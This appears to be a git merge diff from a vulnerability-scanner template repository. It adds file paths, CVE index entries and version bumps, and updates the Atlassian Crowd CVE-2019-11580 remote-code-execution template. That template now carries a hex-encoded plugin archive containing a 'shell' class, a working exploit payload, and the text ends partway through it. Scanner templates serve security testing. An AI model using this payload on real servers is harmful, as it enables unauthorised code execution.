Merge branch 'main' into remediations
commit
cf900022f5
|
@ -15,11 +15,16 @@ http/cves/2023/CVE-2023-32563.yaml
|
||||||
http/cves/2023/CVE-2023-34124.yaml
|
http/cves/2023/CVE-2023-34124.yaml
|
||||||
http/cves/2023/CVE-2023-34192.yaml
|
http/cves/2023/CVE-2023-34192.yaml
|
||||||
http/cves/2023/CVE-2023-36844.yaml
|
http/cves/2023/CVE-2023-36844.yaml
|
||||||
|
http/cves/2023/CVE-2023-38433.yaml
|
||||||
|
http/cves/2023/CVE-2023-39361.yaml
|
||||||
|
http/cves/2023/CVE-2023-39600.yaml
|
||||||
http/cves/2023/CVE-2023-4634.yaml
|
http/cves/2023/CVE-2023-4634.yaml
|
||||||
http/exposed-panels/aspcms-backend-panel.yaml
|
http/exposed-panels/aspcms-backend-panel.yaml
|
||||||
|
http/exposed-panels/dxplanning-panel.yaml
|
||||||
http/exposed-panels/greenbone-panel.yaml
|
http/exposed-panels/greenbone-panel.yaml
|
||||||
http/exposed-panels/jorani-panel.yaml
|
http/exposed-panels/jorani-panel.yaml
|
||||||
http/exposed-panels/snapcomms-panel.yaml
|
http/exposed-panels/snapcomms-panel.yaml
|
||||||
|
http/exposures/apis/seafile-api.yaml
|
||||||
http/miscellaneous/external-service-interaction.yaml
|
http/miscellaneous/external-service-interaction.yaml
|
||||||
http/miscellaneous/rdap-whois.yaml
|
http/miscellaneous/rdap-whois.yaml
|
||||||
http/misconfiguration/ecology-info-leak.yaml
|
http/misconfiguration/ecology-info-leak.yaml
|
||||||
|
@ -29,6 +34,8 @@ http/misconfiguration/nacos/nacos-create-user.yaml
|
||||||
http/misconfiguration/php-debugbar-exposure.yaml
|
http/misconfiguration/php-debugbar-exposure.yaml
|
||||||
http/osint/gist.yaml
|
http/osint/gist.yaml
|
||||||
http/takeovers/lemlist-takeover.yaml
|
http/takeovers/lemlist-takeover.yaml
|
||||||
|
http/technologies/burp-collaborator-detect.yaml
|
||||||
|
http/technologies/honeypot-detect.yaml
|
||||||
http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
|
http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
|
||||||
http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
|
http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
|
||||||
http/technologies/wordpress/plugins/wp-seopress.yaml
|
http/technologies/wordpress/plugins/wp-seopress.yaml
|
||||||
|
@ -37,7 +44,9 @@ http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml
|
||||||
http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml
|
http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml
|
||||||
http/vulnerabilities/jorani/jorani-benjamin-xss.yaml
|
http/vulnerabilities/jorani/jorani-benjamin-xss.yaml
|
||||||
http/vulnerabilities/other/huatian-oa8000-sqli.yaml
|
http/vulnerabilities/other/huatian-oa8000-sqli.yaml
|
||||||
|
http/vulnerabilities/other/kingdee-erp-rce.yaml
|
||||||
http/vulnerabilities/other/landray-oa-datajson-rce.yaml
|
http/vulnerabilities/other/landray-oa-datajson-rce.yaml
|
||||||
http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml
|
http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml
|
||||||
http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml
|
http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml
|
||||||
|
ssl/c2/mythic-c2-ssl.yaml
|
||||||
workflows/kev-workflow.yaml
|
workflows/kev-workflow.yaml
|
||||||
|
|
|
@ -615,7 +615,7 @@
|
||||||
{"ID":"CVE-2019-11248","Info":{"Name":"Debug Endpoint pprof - Exposure Detection","Severity":"high","Description":"The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2019/CVE-2019-11248.yaml"}
|
{"ID":"CVE-2019-11248","Info":{"Name":"Debug Endpoint pprof - Exposure Detection","Severity":"high","Description":"The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2019/CVE-2019-11248.yaml"}
|
||||||
{"ID":"CVE-2019-11370","Info":{"Name":"Carel pCOWeb \u003cB1.2.4 - Cross-Site Scripting","Severity":"medium","Description":"Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html \"System contact\" field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2019/CVE-2019-11370.yaml"}
|
{"ID":"CVE-2019-11370","Info":{"Name":"Carel pCOWeb \u003cB1.2.4 - Cross-Site Scripting","Severity":"medium","Description":"Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html \"System contact\" field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2019/CVE-2019-11370.yaml"}
|
||||||
{"ID":"CVE-2019-11510","Info":{"Name":"Pulse Connect Secure SSL VPN Arbitrary File Read","Severity":"critical","Description":"Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2019/CVE-2019-11510.yaml"}
|
{"ID":"CVE-2019-11510","Info":{"Name":"Pulse Connect Secure SSL VPN Arbitrary File Read","Severity":"critical","Description":"Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2019/CVE-2019-11510.yaml"}
|
||||||
{"ID":"CVE-2019-11580","Info":{"Name":"Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution","Severity":"critical","Description":"Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11580.yaml"}
|
{"ID":"CVE-2019-11580","Info":{"Name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11580.yaml"}
|
||||||
{"ID":"CVE-2019-11581","Info":{"Name":"Atlassian Jira Server-Side Template Injection","Severity":"critical","Description":"Jira Server and Data Center is susceptible to a server-side template injection vulnerability via the ContactAdministrators and SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11581.yaml"}
|
{"ID":"CVE-2019-11581","Info":{"Name":"Atlassian Jira Server-Side Template Injection","Severity":"critical","Description":"Jira Server and Data Center is susceptible to a server-side template injection vulnerability via the ContactAdministrators and SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11581.yaml"}
|
||||||
{"ID":"CVE-2019-11869","Info":{"Name":"WordPress Yuzo \u003c5.12.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting\nbecause it mistakenly expects that is_admin() verifies that the\nrequest comes from an admin user (it actually only verifies that the\nrequest is for an admin page). An unauthenticated attacker can consequently inject\na payload into the plugin settings, such as the\nyuzo_related_post_css_and_style setting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-11869.yaml"}
|
{"ID":"CVE-2019-11869","Info":{"Name":"WordPress Yuzo \u003c5.12.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting\nbecause it mistakenly expects that is_admin() verifies that the\nrequest comes from an admin user (it actually only verifies that the\nrequest is for an admin page). An unauthenticated attacker can consequently inject\na payload into the plugin settings, such as the\nyuzo_related_post_css_and_style setting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-11869.yaml"}
|
||||||
{"ID":"CVE-2019-12276","Info":{"Name":"GrandNode 4.40 - Local File Inclusion","Severity":"high","Description":"GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-12276.yaml"}
|
{"ID":"CVE-2019-12276","Info":{"Name":"GrandNode 4.40 - Local File Inclusion","Severity":"high","Description":"GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-12276.yaml"}
|
||||||
|
@ -2004,12 +2004,15 @@
|
||||||
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
|
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
|
||||||
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
|
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
|
||||||
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
|
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
|
||||||
|
{"ID":"CVE-2023-38433","Info":{"Name":"Fujitsu IP Series - Hardcoded Credentials","Severity":"high","Description":"Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38433.yaml"}
|
||||||
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
|
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
|
||||||
{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"}
|
{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"}
|
||||||
{"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"}
|
{"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"}
|
||||||
{"ID":"CVE-2023-39141","Info":{"Name":"Aria2 WebUI - Path traversal","Severity":"high","Description":"webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39141.yaml"}
|
{"ID":"CVE-2023-39141","Info":{"Name":"Aria2 WebUI - Path traversal","Severity":"high","Description":"webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39141.yaml"}
|
||||||
{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"}
|
{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"}
|
||||||
{"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"}
|
{"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"}
|
||||||
|
{"ID":"CVE-2023-39361","Info":{"Name":"Cacti 1.2.24 - SQL Injection","Severity":"critical","Description":"Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39361.yaml"}
|
||||||
|
{"ID":"CVE-2023-39600","Info":{"Name":"IceWarp 11.4.6.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39600.yaml"}
|
||||||
{"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"}
|
{"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"}
|
||||||
{"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
|
{"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
|
||||||
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
|
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
bf4766f6ec2eca9601df9f6f4b11e620
|
d3d61b5b23048ba01c949efdf8b4fe02
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
6.2.0
|
6.2.1
|
|
@ -1 +1 @@
|
||||||
3.1.3
|
3.1.4
|
|
@ -1 +1 @@
|
||||||
5.8.7
|
5.8.8
|
|
@ -1 +1 @@
|
||||||
7.2.0
|
7.2.1
|
|
@ -1 +1 @@
|
||||||
5.0.8
|
5.0.9
|
|
@ -1 +1 @@
|
||||||
16.5.1
|
16.6.0
|
|
@ -1 +1 @@
|
||||||
5.7.1
|
5.7.2
|
|
@ -1 +1 @@
|
||||||
2.1.8
|
2.2.0
|
|
@ -1 +1 @@
|
||||||
9.4.4
|
9.4.5.1
|
|
@ -1 +1 @@
|
||||||
1.0.122
|
1.0.201.1
|
|
@ -1 +1 @@
|
||||||
5.9.6
|
N/A
|
|
@ -1 +1 @@
|
||||||
6.3.2
|
6.4.1
|
|
@ -1 +1 @@
|
||||||
10.6
|
10.6.1
|
|
@ -1 +1 @@
|
||||||
4.13.1
|
4.13.2
|
|
@ -1,7 +1,7 @@
|
||||||
id: CVE-2019-11580
|
id: CVE-2019-11580
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution
|
name: Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: critical
|
severity: critical
|
||||||
description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
|
description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
|
||||||
|
@ -16,30 +16,40 @@ info:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2019-11580
|
cve-id: CVE-2019-11580
|
||||||
epss-score: 0.97501
|
|
||||||
epss-percentile: 0.99963
|
|
||||||
cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*
|
||||||
|
epss-score: 0.97491
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 2
|
||||||
vendor: atlassian
|
|
||||||
product: crowd
|
product: crowd
|
||||||
shodan-query: http.component:"Atlassian Jira"
|
shodan-query: http.component:"Atlassian Jira"
|
||||||
tags: packetstorm,kev,cve,cve2019,atlassian,rce
|
vendor: atlassian
|
||||||
|
tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth
|
||||||
|
|
||||||
|
variables:
|
||||||
|
plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636